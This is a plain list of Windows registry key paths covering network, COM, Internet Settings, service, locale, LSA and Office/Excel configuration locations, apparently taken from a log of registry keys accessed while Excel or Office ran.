HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\SearchList
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\NodeType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpNodeType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\ScopeId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpScopeId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableProxy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableDns
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\Com+Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\MaxSxSHashCount
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameTabWindow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SessionMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\TabProcGrowth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Group
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted\CoInitializeSecurityParam
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted\ImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted\AuthenticationCapabilities
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted\CoInitializeSecurityAppID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted\DeferredCoInitializeSecurityServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted\SystemCritical
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Parameters\ServiceDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Parameters\ServiceManifest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Parameters\ServiceMain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\IgnoreShimmedAppCheck
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\AA559E2D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\ExecutablesToExclude
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Quarantined\C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Monitored\C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\Language
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\DevInstall
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\ImpressionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\FlightNumberline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\BuildNumber
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\AudienceImpersonatedInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Expires
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\ETag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\FirstSessionTriggered
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109C80000000000000000F01FEC\InstallProperties\WindowsInstaller
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E70000000000000000F01FEC\InstallProperties\WindowsInstaller
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\ProductReleaseIds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\ProPlusRetail.TenantId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\EcsRequestPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\EdgeRequestPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\FlightNumberlines
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\ConfigIds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\ClientFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\MID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\SusClientId
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InsecureQI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\DisableFirstRun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\SubscriptionCustomerLicenseInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\VersionToReport
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\PipelineServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService\9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureRoutine
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ExecutingScenario
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\AppUserIdleTimerInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\AppUserIdleResetInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InsecureQI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Scenario\UPDATE\DisplayLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\OfficeClickToRun.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DocumentSyncTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WinHttpSecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\ForceDefaultAutoLogonLevelLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\OfficeClickToRun.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A00
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1A00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1A00
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\FlightingVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling\1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\excel\Overrides
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\excel\Flights
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\excel\Flights
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\Flight\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\FirstSessionTriggered
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Usage\ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UISnapshotLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\!vh
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\"vh
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Usage\EXCELFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\MTTA
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelName
